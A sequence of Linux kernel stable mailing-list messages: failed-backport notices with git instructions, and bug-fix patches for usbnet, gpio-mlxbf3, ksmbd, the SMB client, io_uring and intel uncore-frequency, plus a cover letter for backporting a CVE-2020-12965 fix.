The patch below does not apply to the 5.4-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.4.y
git checkout FETCH_HEAD
git cherry-pick -x 8466d393700f9ccef68134d3349f4e0a087679b9
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081206-rejoicing-democrat-be9e@gregkh' --subject-prefix 'PATCH 5.4.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 8466d393700f9ccef68134d3349f4e0a087679b9 Mon Sep 17 00:00:00 2001
From: Ammar Faizi <ammarfaizi2(a)gnuweeb.org>
Date: Wed, 6 Aug 2025 07:31:05 +0700
Subject: [PATCH] net: usbnet: Fix the wrong netif_carrier_on() call
The commit referenced in the Fixes tag causes usbnet to malfunction
(identified via git bisect). Post-commit, my external RJ45 LAN cable
fails to connect. Linus also reported the same issue after pulling that
commit.
The code has a logic error: netif_carrier_on() is only called when the
link is already on. Fix this by moving the netif_carrier_on() call
outside the if-statement entirely. This ensures it is always called
when EVENT_LINK_CARRIER_ON is set and properly clears it regardless
of the link state.
Cc: stable(a)vger.kernel.org
Cc: Armando Budianto <sprite(a)gnuweeb.org>
Reviewed-by: Simon Horman <horms(a)kernel.org>
Suggested-by: Linus Torvalds <torvalds(a)linux-foundation.org>
Link: https://lore.kernel.org/all/CAHk-=wjqL4uF0MG_c8+xHX1Vv8==sPYQrtzbdA3kzi9628…
Closes: https://lore.kernel.org/netdev/CAHk-=wjKh8X4PT_mU1kD4GQrbjivMfPn-_hXa6han_B…
Closes: https://lore.kernel.org/netdev/0752dee6-43d6-4e1f-81d2-4248142cccd2@gnuweeb…
Fixes: 0d9cfc9b8cb1 ("net: usbnet: Avoid potential RCU stall on LINK_CHANGE event")
Signed-off-by: Ammar Faizi <ammarfaizi2(a)gnuweeb.org>
Signed-off-by: Linus Torvalds <torvalds(a)linux-foundation.org>
diff --git a/drivers/net/usb/usbnet.c b/drivers/net/usb/usbnet.c
index a38ffbf4b3f0..511c4154cf74 100644
--- a/drivers/net/usb/usbnet.c
+++ b/drivers/net/usb/usbnet.c
@@ -1120,6 +1120,9 @@ static void __handle_link_change(struct usbnet *dev)
if (!test_bit(EVENT_DEV_OPEN, &dev->flags))
return;
+ if (test_and_clear_bit(EVENT_LINK_CARRIER_ON, &dev->flags))
+ netif_carrier_on(dev->net);
+
if (!netif_carrier_ok(dev->net)) {
/* kill URBs for reading packets to save bus bandwidth */
unlink_urbs(dev, &dev->rxq);
@@ -1129,9 +1132,6 @@ static void __handle_link_change(struct usbnet *dev)
* tx queue is stopped by netcore after link becomes off
*/
} else {
- if (test_and_clear_bit(EVENT_LINK_CARRIER_ON, &dev->flags))
- netif_carrier_on(dev->net);
-
/* submitting URBs for reading packets */
queue_work(system_bh_wq, &dev->bh_work);
}
The patch below does not apply to the 5.10-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.10.y
git checkout FETCH_HEAD
git cherry-pick -x 8466d393700f9ccef68134d3349f4e0a087679b9
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081204-broken-atlas-ad4f@gregkh' --subject-prefix 'PATCH 5.10.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 8466d393700f9ccef68134d3349f4e0a087679b9 Mon Sep 17 00:00:00 2001
From: Ammar Faizi <ammarfaizi2(a)gnuweeb.org>
Date: Wed, 6 Aug 2025 07:31:05 +0700
Subject: [PATCH] net: usbnet: Fix the wrong netif_carrier_on() call
The commit referenced in the Fixes tag causes usbnet to malfunction
(identified via git bisect). Post-commit, my external RJ45 LAN cable
fails to connect. Linus also reported the same issue after pulling that
commit.
The code has a logic error: netif_carrier_on() is only called when the
link is already on. Fix this by moving the netif_carrier_on() call
outside the if-statement entirely. This ensures it is always called
when EVENT_LINK_CARRIER_ON is set and properly clears it regardless
of the link state.
Cc: stable(a)vger.kernel.org
Cc: Armando Budianto <sprite(a)gnuweeb.org>
Reviewed-by: Simon Horman <horms(a)kernel.org>
Suggested-by: Linus Torvalds <torvalds(a)linux-foundation.org>
Link: https://lore.kernel.org/all/CAHk-=wjqL4uF0MG_c8+xHX1Vv8==sPYQrtzbdA3kzi9628…
Closes: https://lore.kernel.org/netdev/CAHk-=wjKh8X4PT_mU1kD4GQrbjivMfPn-_hXa6han_B…
Closes: https://lore.kernel.org/netdev/0752dee6-43d6-4e1f-81d2-4248142cccd2@gnuweeb…
Fixes: 0d9cfc9b8cb1 ("net: usbnet: Avoid potential RCU stall on LINK_CHANGE event")
Signed-off-by: Ammar Faizi <ammarfaizi2(a)gnuweeb.org>
Signed-off-by: Linus Torvalds <torvalds(a)linux-foundation.org>
diff --git a/drivers/net/usb/usbnet.c b/drivers/net/usb/usbnet.c
index a38ffbf4b3f0..511c4154cf74 100644
--- a/drivers/net/usb/usbnet.c
+++ b/drivers/net/usb/usbnet.c
@@ -1120,6 +1120,9 @@ static void __handle_link_change(struct usbnet *dev)
if (!test_bit(EVENT_DEV_OPEN, &dev->flags))
return;
+ if (test_and_clear_bit(EVENT_LINK_CARRIER_ON, &dev->flags))
+ netif_carrier_on(dev->net);
+
if (!netif_carrier_ok(dev->net)) {
/* kill URBs for reading packets to save bus bandwidth */
unlink_urbs(dev, &dev->rxq);
@@ -1129,9 +1132,6 @@ static void __handle_link_change(struct usbnet *dev)
* tx queue is stopped by netcore after link becomes off
*/
} else {
- if (test_and_clear_bit(EVENT_LINK_CARRIER_ON, &dev->flags))
- netif_carrier_on(dev->net);
-
/* submitting URBs for reading packets */
queue_work(system_bh_wq, &dev->bh_work);
}
Now that I have a proper email address, add me to the CC list so I don't
have to subscribe to <stable(a)vger.kernel.org> only to get this mail.
Signed-off-by: Achill Gilgenast <achill(a)achill.org>
---
scripts/quilt-mail | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/scripts/quilt-mail b/scripts/quilt-mail
index e0df3d935f..531d9fafb9 100755
--- a/scripts/quilt-mail
+++ b/scripts/quilt-mail
@@ -181,7 +181,8 @@ CC_NAMES=("linux-kernel(a)vger\.kernel\.org"
"rwarsow(a)gmx\.de"
"conor(a)kernel\.org"
"hargar(a)microsoft\.com"
- "broonie(a)kernel\.org")
+ "broonie(a)kernel\.org"
+ "achill(a)achill\.org")
#CC_LIST="stable(a)vger\.kernel\.org"
CC_LIST="patches(a)lists.linux.dev"
--
2.50.1
This reverts commit 10af0273a35ab4513ca1546644b8c853044da134.
While this change was merged, it is not the preferred solution.
During review of a similar change to the gpio-mlxbf2 driver, the
use of "platform_get_irq_optional" was identified as the preferred
solution, so let's use it for gpio-mlxbf3 driver as well.
Cc: stable(a)vger.kernel.org
Fixes: 10af0273a35a ("gpio: mlxbf3: only get IRQ for device instance 0")
Signed-off-by: David Thompson <davthompson(a)nvidia.com>
---
drivers/gpio/gpio-mlxbf3.c | 54 ++++++++++++++------------------------
1 file changed, 19 insertions(+), 35 deletions(-)
diff --git a/drivers/gpio/gpio-mlxbf3.c b/drivers/gpio/gpio-mlxbf3.c
index 9875e34bde72..10ea71273c89 100644
--- a/drivers/gpio/gpio-mlxbf3.c
+++ b/drivers/gpio/gpio-mlxbf3.c
@@ -190,9 +190,7 @@ static int mlxbf3_gpio_probe(struct platform_device *pdev)
struct mlxbf3_gpio_context *gs;
struct gpio_irq_chip *girq;
struct gpio_chip *gc;
- char *colon_ptr;
int ret, irq;
- long num;
gs = devm_kzalloc(dev, sizeof(*gs), GFP_KERNEL);
if (!gs)
@@ -229,39 +227,25 @@ static int mlxbf3_gpio_probe(struct platform_device *pdev)
gc->owner = THIS_MODULE;
gc->add_pin_ranges = mlxbf3_gpio_add_pin_ranges;
- colon_ptr = strchr(dev_name(dev), ':');
- if (!colon_ptr) {
- dev_err(dev, "invalid device name format\n");
- return -EINVAL;
- }
-
- ret = kstrtol(++colon_ptr, 16, &num);
- if (ret) {
- dev_err(dev, "invalid device instance\n");
- return ret;
- }
-
- if (!num) {
- irq = platform_get_irq(pdev, 0);
- if (irq >= 0) {
- girq = &gs->gc.irq;
- gpio_irq_chip_set_chip(girq, &gpio_mlxbf3_irqchip);
- girq->default_type = IRQ_TYPE_NONE;
- /* This will let us handle the parent IRQ in the driver */
- girq->num_parents = 0;
- girq->parents = NULL;
- girq->parent_handler = NULL;
- girq->handler = handle_bad_irq;
-
- /*
- * Directly request the irq here instead of passing
- * a flow-handler because the irq is shared.
- */
- ret = devm_request_irq(dev, irq, mlxbf3_gpio_irq_handler,
- IRQF_SHARED, dev_name(dev), gs);
- if (ret)
- return dev_err_probe(dev, ret, "failed to request IRQ");
- }
+ irq = platform_get_irq(pdev, 0);
+ if (irq >= 0) {
+ girq = &gs->gc.irq;
+ gpio_irq_chip_set_chip(girq, &gpio_mlxbf3_irqchip);
+ girq->default_type = IRQ_TYPE_NONE;
+ /* This will let us handle the parent IRQ in the driver */
+ girq->num_parents = 0;
+ girq->parents = NULL;
+ girq->parent_handler = NULL;
+ girq->handler = handle_bad_irq;
+
+ /*
+ * Directly request the irq here instead of passing
+ * a flow-handler because the irq is shared.
+ */
+ ret = devm_request_irq(dev, irq, mlxbf3_gpio_irq_handler,
+ IRQF_SHARED, dev_name(dev), gs);
+ if (ret)
+ return dev_err_probe(dev, ret, "failed to request IRQ");
}
platform_set_drvdata(pdev, gs);
--
2.43.2
The gpio-mlxbf3 driver interfaces with two GPIO controllers,
device instance 0 and 1. There is a single IRQ resource shared
between the two controllers, and it is found in the ACPI table for
device instance 0. The driver should not use platform_get_irq(),
otherwise this error is logged when probing instance 1:
mlxbf3_gpio MLNXBF33:01: error -ENXIO: IRQ index 0 not found
Cc: stable(a)vger.kernel.org
Fixes: cd33f216d241 ("gpio: mlxbf3: Add gpio driver support")
Signed-off-by: David Thompson <davthompson(a)nvidia.com>
Reviewed-by: Andy Shevchenko <andriy.shevchenko(a)linux.intel.com>
---
drivers/gpio/gpio-mlxbf3.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/drivers/gpio/gpio-mlxbf3.c b/drivers/gpio/gpio-mlxbf3.c
index 10ea71273c89..ed29b07d16c1 100644
--- a/drivers/gpio/gpio-mlxbf3.c
+++ b/drivers/gpio/gpio-mlxbf3.c
@@ -227,7 +227,7 @@ static int mlxbf3_gpio_probe(struct platform_device *pdev)
gc->owner = THIS_MODULE;
gc->add_pin_ranges = mlxbf3_gpio_add_pin_ranges;
- irq = platform_get_irq(pdev, 0);
+ irq = platform_get_irq_optional(pdev, 0);
if (irq >= 0) {
girq = &gs->gc.irq;
gpio_irq_chip_set_chip(girq, &gpio_mlxbf3_irqchip);
--
2.43.2
This reverts commit 10af0273a35ab4513ca1546644b8c853044da134.
While this change was merged, it is not the preferred solution.
During review of a similar change to the gpio-mlxbf2 driver, the
use of "platform_get_irq_optional" was identified as the preferred
solution, so let's use it for gpio-mlxbf3 driver as well.
Cc: stable(a)vger.kernel.org
Fixes: 10af0273a35a ("gpio: mlxbf3: only get IRQ for device instance 0")
Signed-off-by: David Thompson <davthompson(a)nvidia.com>
Reviewed-by: Andy Shevchenko <andriy.shevchenko(a)linux.intel.com>
---
drivers/gpio/gpio-mlxbf3.c | 54 ++++++++++++++------------------------
1 file changed, 19 insertions(+), 35 deletions(-)
diff --git a/drivers/gpio/gpio-mlxbf3.c b/drivers/gpio/gpio-mlxbf3.c
index 9875e34bde72..10ea71273c89 100644
--- a/drivers/gpio/gpio-mlxbf3.c
+++ b/drivers/gpio/gpio-mlxbf3.c
@@ -190,9 +190,7 @@ static int mlxbf3_gpio_probe(struct platform_device *pdev)
struct mlxbf3_gpio_context *gs;
struct gpio_irq_chip *girq;
struct gpio_chip *gc;
- char *colon_ptr;
int ret, irq;
- long num;
gs = devm_kzalloc(dev, sizeof(*gs), GFP_KERNEL);
if (!gs)
@@ -229,39 +227,25 @@ static int mlxbf3_gpio_probe(struct platform_device *pdev)
gc->owner = THIS_MODULE;
gc->add_pin_ranges = mlxbf3_gpio_add_pin_ranges;
- colon_ptr = strchr(dev_name(dev), ':');
- if (!colon_ptr) {
- dev_err(dev, "invalid device name format\n");
- return -EINVAL;
- }
-
- ret = kstrtol(++colon_ptr, 16, &num);
- if (ret) {
- dev_err(dev, "invalid device instance\n");
- return ret;
- }
-
- if (!num) {
- irq = platform_get_irq(pdev, 0);
- if (irq >= 0) {
- girq = &gs->gc.irq;
- gpio_irq_chip_set_chip(girq, &gpio_mlxbf3_irqchip);
- girq->default_type = IRQ_TYPE_NONE;
- /* This will let us handle the parent IRQ in the driver */
- girq->num_parents = 0;
- girq->parents = NULL;
- girq->parent_handler = NULL;
- girq->handler = handle_bad_irq;
-
- /*
- * Directly request the irq here instead of passing
- * a flow-handler because the irq is shared.
- */
- ret = devm_request_irq(dev, irq, mlxbf3_gpio_irq_handler,
- IRQF_SHARED, dev_name(dev), gs);
- if (ret)
- return dev_err_probe(dev, ret, "failed to request IRQ");
- }
+ irq = platform_get_irq(pdev, 0);
+ if (irq >= 0) {
+ girq = &gs->gc.irq;
+ gpio_irq_chip_set_chip(girq, &gpio_mlxbf3_irqchip);
+ girq->default_type = IRQ_TYPE_NONE;
+ /* This will let us handle the parent IRQ in the driver */
+ girq->num_parents = 0;
+ girq->parents = NULL;
+ girq->parent_handler = NULL;
+ girq->handler = handle_bad_irq;
+
+ /*
+ * Directly request the irq here instead of passing
+ * a flow-handler because the irq is shared.
+ */
+ ret = devm_request_irq(dev, irq, mlxbf3_gpio_irq_handler,
+ IRQF_SHARED, dev_name(dev), gs);
+ if (ret)
+ return dev_err_probe(dev, ret, "failed to request IRQ");
}
platform_set_drvdata(pdev, gs);
--
2.43.2
Hi everyone,
This is v2 of my series to backport the critical security fix,
identified as CVE-2020-12965 ("Transient Execution of Non-Canonical Accesses"),
to the 6.6.y stable kernel tree.
Linus Torvalds's second proposed solution offers a more targeted and
smaller backport for CVE-2020-12965 compared to backporting the entire
patch series.
This alternative would focus solely on the user address masking
logic that addresses the AMD speculation issue with non-canonical
addresses.
Instead of introducing the extensive "runtime-constant"
infrastructure seen in the larger patch series, this solution would:
- Introduce a single new variable for the USER_PTR_MAX
value.
- Use an actual memory load to access this USER_PTR_MAX value, rather than
leveraging the runtime_const mechanism.
While this approach would result in a noticeably smaller and more
localized patch, it would differ from what's currently in the
mainline kernel. This divergence would necessitate significant
additional testing to ensure its stability.
I am ready to implement the second proposed solution if the
maintainers wish to move forward in that direction, understanding the
testing implications. Please let me know your preference.
Changes in v2:
==============
- Incorporated the commit 91309a708: x86: use cmov for user address
as suggested by David Laight. This commit is now included as the first patch
in the series.
This series addresses the CVE-2020-12965 vulnerability by
introducing the necessary x86 infrastructure and the specific fix for user
address masking non-canonical speculation issues.
v1:
==============
This patch series backports a critical security fix, identified as
CVE-2020-12965 ("Transient Execution of Non-Canonical Accesses"), to the
6.6.y stable kernel tree.
David Laight (1):
x86: fix off-by-one in access_ok()
Linus Torvalds (6):
vfs: dcache: move hashlen_hash() from callers into d_hash()
runtime constants: add default dummy infrastructure
runtime constants: add x86 architecture support
arm64: add 'runtime constant' support
x86: fix user address masking non-canonical speculation issue
x86: use cmov for user address masking
arch/arm64/include/asm/runtime-const.h | 92 ++++++++++++++++++++++++++
arch/arm64/kernel/vmlinux.lds.S | 3 +
arch/x86/include/asm/runtime-const.h | 61 +++++++++++++++++
arch/x86/include/asm/uaccess_64.h | 44 +++++++-----
arch/x86/kernel/cpu/common.c | 10 +++
arch/x86/kernel/vmlinux.lds.S | 4 ++
arch/x86/lib/getuser.S | 10 ++-
fs/dcache.c | 17 +++--
include/asm-generic/Kbuild | 1 +
include/asm-generic/runtime-const.h | 15 +++++
include/asm-generic/vmlinux.lds.h | 8 +++
11 files changed, 242 insertions(+), 23 deletions(-)
create mode 100644 arch/arm64/include/asm/runtime-const.h
create mode 100644 arch/x86/include/asm/runtime-const.h
create mode 100644 include/asm-generic/runtime-const.h
--
2.50.1.470.g6ba607880d-goog
Add the missing write_blocked check for updating sysfs related to uncore
efficiency latency control (ELC). If write operation is blocked return
error.
Fixes: bb516dc79c4a ("platform/x86/intel-uncore-freq: Add support for efficiency latency control")
Signed-off-by: Srinivas Pandruvada <srinivas.pandruvada(a)linux.intel.com>
Cc: stable(a)vger.kernel.org
---
Non urgent patch. It can go through regular merge window even if it has fix tag.
This is not a current production use case.
Rebased on
https://kernel.googlesource.com/pub/scm/linux/kernel/git/pdx86/platform-dri…
for-next
.../x86/intel/uncore-frequency/uncore-frequency-tpmi.c | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-tpmi.c b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-tpmi.c
index 6df55c8e16b7..bfcf92aa4d69 100644
--- a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-tpmi.c
+++ b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-tpmi.c
@@ -192,9 +192,14 @@ static int uncore_read_control_freq(struct uncore_data *data, unsigned int *valu
static int write_eff_lat_ctrl(struct uncore_data *data, unsigned int val, enum uncore_index index)
{
struct tpmi_uncore_cluster_info *cluster_info;
+ struct tpmi_uncore_struct *uncore_root;
u64 control;
cluster_info = container_of(data, struct tpmi_uncore_cluster_info, uncore_data);
+ uncore_root = cluster_info->uncore_root;
+
+ if (uncore_root->write_blocked)
+ return -EPERM;
if (cluster_info->root_domain)
return -ENODATA;
--
2.49.0
Hello,
I have come across the linux kernel
commit 805e3ce5e0e32b31dcecc0774c57c17a1f13cef6 merged into the 6.15 kernel.
Kernel Commit:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?…
Currently, we need this fix into the latest 6.8 based kernel as our servers
are all based on Ubuntu 24.04 with 6.8 based kernels. Please let us know
the process for the same.
Could you please help in this regard. Any help on this would be greatly
appreciated.
Thanks,
Srikanth
The patch below does not apply to the 6.1-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.1.y
git checkout FETCH_HEAD
git cherry-pick -x 6b445309eec2bc0594f3e24c7777aeef891d386e
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081220-superbowl-aerospace-880f@gregkh' --subject-prefix 'PATCH 6.1.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 6b445309eec2bc0594f3e24c7777aeef891d386e Mon Sep 17 00:00:00 2001
From: Paulo Alcantara <pc(a)manguebit.org>
Date: Thu, 31 Jul 2025 20:46:42 -0300
Subject: [PATCH] smb: client: default to nonativesocket under POSIX mounts
SMB3.1.1 POSIX mounts require sockets to be created with NFS reparse
points.
Cc: linux-cifs(a)vger.kernel.org
Cc: Ralph Boehme <slow(a)samba.org>
Cc: David Howells <dhowells(a)redhat.com>
Cc: <stable(a)vger.kernel.org>
Reported-by: Matthew Richardson <m.richardson(a)ed.ac.uk>
Closes: https://marc.info/?i=1124e7cd-6a46-40a6-9f44-b7664a66654b@ed.ac.uk
Signed-off-by: Paulo Alcantara (Red Hat) <pc(a)manguebit.org>
Signed-off-by: Steve French <stfrench(a)microsoft.com>
diff --git a/fs/smb/client/fs_context.c b/fs/smb/client/fs_context.c
index cc8bd79ebca9..072383899e81 100644
--- a/fs/smb/client/fs_context.c
+++ b/fs/smb/client/fs_context.c
@@ -1652,6 +1652,7 @@ static int smb3_fs_context_parse_param(struct fs_context *fc,
pr_warn_once("conflicting posix mount options specified\n");
ctx->linux_ext = 1;
ctx->no_linux_ext = 0;
+ ctx->nonativesocket = 1; /* POSIX mounts use NFS style reparse points */
}
break;
case Opt_nocase:
The patch below does not apply to the 6.6-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.6.y
git checkout FETCH_HEAD
git cherry-pick -x 6b445309eec2bc0594f3e24c7777aeef891d386e
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081229-unbraided-drinking-9839@gregkh' --subject-prefix 'PATCH 6.6.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 6b445309eec2bc0594f3e24c7777aeef891d386e Mon Sep 17 00:00:00 2001
From: Paulo Alcantara <pc(a)manguebit.org>
Date: Thu, 31 Jul 2025 20:46:42 -0300
Subject: [PATCH] smb: client: default to nonativesocket under POSIX mounts
SMB3.1.1 POSIX mounts require sockets to be created with NFS reparse
points.
Cc: linux-cifs(a)vger.kernel.org
Cc: Ralph Boehme <slow(a)samba.org>
Cc: David Howells <dhowells(a)redhat.com>
Cc: <stable(a)vger.kernel.org>
Reported-by: Matthew Richardson <m.richardson(a)ed.ac.uk>
Closes: https://marc.info/?i=1124e7cd-6a46-40a6-9f44-b7664a66654b@ed.ac.uk
Signed-off-by: Paulo Alcantara (Red Hat) <pc(a)manguebit.org>
Signed-off-by: Steve French <stfrench(a)microsoft.com>
diff --git a/fs/smb/client/fs_context.c b/fs/smb/client/fs_context.c
index cc8bd79ebca9..072383899e81 100644
--- a/fs/smb/client/fs_context.c
+++ b/fs/smb/client/fs_context.c
@@ -1652,6 +1652,7 @@ static int smb3_fs_context_parse_param(struct fs_context *fc,
pr_warn_once("conflicting posix mount options specified\n");
ctx->linux_ext = 1;
ctx->no_linux_ext = 0;
+ ctx->nonativesocket = 1; /* POSIX mounts use NFS style reparse points */
}
break;
case Opt_nocase:
The patch below does not apply to the 6.12-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.12.y
git checkout FETCH_HEAD
git cherry-pick -x 6b445309eec2bc0594f3e24c7777aeef891d386e
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081229-blizzard-gout-ee04@gregkh' --subject-prefix 'PATCH 6.12.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 6b445309eec2bc0594f3e24c7777aeef891d386e Mon Sep 17 00:00:00 2001
From: Paulo Alcantara <pc(a)manguebit.org>
Date: Thu, 31 Jul 2025 20:46:42 -0300
Subject: [PATCH] smb: client: default to nonativesocket under POSIX mounts
SMB3.1.1 POSIX mounts require sockets to be created with NFS reparse
points.
Cc: linux-cifs(a)vger.kernel.org
Cc: Ralph Boehme <slow(a)samba.org>
Cc: David Howells <dhowells(a)redhat.com>
Cc: <stable(a)vger.kernel.org>
Reported-by: Matthew Richardson <m.richardson(a)ed.ac.uk>
Closes: https://marc.info/?i=1124e7cd-6a46-40a6-9f44-b7664a66654b@ed.ac.uk
Signed-off-by: Paulo Alcantara (Red Hat) <pc(a)manguebit.org>
Signed-off-by: Steve French <stfrench(a)microsoft.com>
diff --git a/fs/smb/client/fs_context.c b/fs/smb/client/fs_context.c
index cc8bd79ebca9..072383899e81 100644
--- a/fs/smb/client/fs_context.c
+++ b/fs/smb/client/fs_context.c
@@ -1652,6 +1652,7 @@ static int smb3_fs_context_parse_param(struct fs_context *fc,
pr_warn_once("conflicting posix mount options specified\n");
ctx->linux_ext = 1;
ctx->no_linux_ext = 0;
+ ctx->nonativesocket = 1; /* POSIX mounts use NFS style reparse points */
}
break;
case Opt_nocase:
The patch below does not apply to the 5.4-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.4.y
git checkout FETCH_HEAD
git cherry-pick -x 8e7d178d06e8937454b6d2f2811fa6a15656a214
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081256-unhitched-broadcast-2eef@gregkh' --subject-prefix 'PATCH 5.4.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 8e7d178d06e8937454b6d2f2811fa6a15656a214 Mon Sep 17 00:00:00 2001
From: Thorsten Blum <thorsten.blum(a)linux.dev>
Date: Wed, 6 Aug 2025 03:03:49 +0200
Subject: [PATCH] smb: server: Fix extension string in
ksmbd_extract_shortname()
In ksmbd_extract_shortname(), strscpy() is incorrectly called with the
length of the source string (excluding the NUL terminator) rather than
the size of the destination buffer. This results in "__" being copied
to 'extension' rather than "___" (two underscores instead of three).
Use the destination buffer size instead to ensure that the string "___"
(three underscores) is copied correctly.
Cc: stable(a)vger.kernel.org
Fixes: e2f34481b24d ("cifsd: add server-side procedures for SMB3")
Signed-off-by: Thorsten Blum <thorsten.blum(a)linux.dev>
Acked-by: Namjae Jeon <linkinjeon(a)kernel.org>
Signed-off-by: Steve French <stfrench(a)microsoft.com>
diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
index 425c756bcfb8..b23203a1c286 100644
--- a/fs/smb/server/smb_common.c
+++ b/fs/smb/server/smb_common.c
@@ -515,7 +515,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
p = strrchr(longname, '.');
if (p == longname) { /*name starts with a dot*/
- strscpy(extension, "___", strlen("___"));
+ strscpy(extension, "___", sizeof(extension));
} else {
if (p) {
p++;
The patch below does not apply to the 5.10-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.10.y
git checkout FETCH_HEAD
git cherry-pick -x 8e7d178d06e8937454b6d2f2811fa6a15656a214
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081253-lapping-empathic-d0ae@gregkh' --subject-prefix 'PATCH 5.10.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 8e7d178d06e8937454b6d2f2811fa6a15656a214 Mon Sep 17 00:00:00 2001
From: Thorsten Blum <thorsten.blum(a)linux.dev>
Date: Wed, 6 Aug 2025 03:03:49 +0200
Subject: [PATCH] smb: server: Fix extension string in
ksmbd_extract_shortname()
In ksmbd_extract_shortname(), strscpy() is incorrectly called with the
length of the source string (excluding the NUL terminator) rather than
the size of the destination buffer. This results in "__" being copied
to 'extension' rather than "___" (two underscores instead of three).
Use the destination buffer size instead to ensure that the string "___"
(three underscores) is copied correctly.
Cc: stable(a)vger.kernel.org
Fixes: e2f34481b24d ("cifsd: add server-side procedures for SMB3")
Signed-off-by: Thorsten Blum <thorsten.blum(a)linux.dev>
Acked-by: Namjae Jeon <linkinjeon(a)kernel.org>
Signed-off-by: Steve French <stfrench(a)microsoft.com>
diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
index 425c756bcfb8..b23203a1c286 100644
--- a/fs/smb/server/smb_common.c
+++ b/fs/smb/server/smb_common.c
@@ -515,7 +515,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
p = strrchr(longname, '.');
if (p == longname) { /*name starts with a dot*/
- strscpy(extension, "___", strlen("___"));
+ strscpy(extension, "___", sizeof(extension));
} else {
if (p) {
p++;
commit bcb0fda3c2da9fe4721d3e73d80e778c038e7d27 upstream.
The IOPOLL path posts CQEs when the io_kiocb is marked as completed,
so it cannot rely on the usual retry that non-IOPOLL requests do for
read/write requests.
If -EAGAIN is received and the request should be retried, go through
the normal completion path and let the normal flush logic catch it and
reissue it, like what is done for !IOPOLL reads or writes.
Fixes: d803d123948f ("io_uring/rw: handle -EAGAIN retry at IO completion time")
Reported-by: John Garry <john.g.garry(a)oracle.com>
Link: https://lore.kernel.org/io-uring/2b43ccfa-644d-4a09-8f8f-39ad71810f41@oracl…
Signed-off-by: Jens Axboe <axboe(a)kernel.dk>
Signed-off-by: Sumanth Gavini <sumanth.gavini(a)yahoo.com>
---
io_uring/rw.c | 7 +++----
1 file changed, 3 insertions(+), 4 deletions(-)
diff --git a/io_uring/rw.c b/io_uring/rw.c
index 4ff3442ac2ee..6a84c4a39ce9 100644
--- a/io_uring/rw.c
+++ b/io_uring/rw.c
@@ -326,11 +326,10 @@ static void io_complete_rw_iopoll(struct kiocb *kiocb, long res)
if (kiocb->ki_flags & IOCB_WRITE)
io_req_end_write(req);
if (unlikely(res != req->cqe.res)) {
- if (res == -EAGAIN && io_rw_should_reissue(req)) {
+ if (res == -EAGAIN && io_rw_should_reissue(req))
req->flags |= REQ_F_REISSUE | REQ_F_PARTIAL_IO;
- return;
- }
- req->cqe.res = res;
+ else
+ req->cqe.res = res;
}
/* order with io_iopoll_complete() checking ->iopoll_completed */
--
2.43.0
From: Gabor Juhos <j4g8y7(a)gmail.com>
